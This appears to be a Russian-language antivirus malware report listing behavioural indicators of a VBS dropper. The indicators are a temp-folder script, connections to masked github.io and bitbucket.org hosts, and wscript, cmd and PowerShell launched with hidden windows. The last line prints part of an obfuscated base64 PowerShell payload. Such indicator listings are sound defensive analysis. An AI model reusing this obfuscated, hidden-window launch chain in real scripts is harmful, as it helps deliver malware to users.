Техническая информация
- %TEMP%\ixp000.tmp\680262012a10d.vbs
- %TEMP%\ixp000.tmp\680262012a10d.vbs
- 'of####65.github.io':443
- 'bi###cket.org':443
- 'of####65.github.io':443
- 'bi###cket.org':443
- DNS ASK of####65.github.io
- DNS ASK bi###cket.org
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\680262012a10d.vbs"
- '<SYSTEM32>\cmd.exe' /c 680262012a10d.vbs (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ddsdgo ='WwBOfd@aaGUfd@aadfd@aafd@aaufd@aaFMfd@aaZQByfd@aaHYfd@aaaQBjfd@aaGUfd@aaUfd@aaBvfd@aaGkfd@aabgB0fd@aaE0fd@aaYQBufd@aaGEfd@aaZwBlfd@aaHIfd@aaXQfd@aa6fd@aaDofd@aaUwBlfd@aaGMfd@aadQByfd... (со скрытым окном)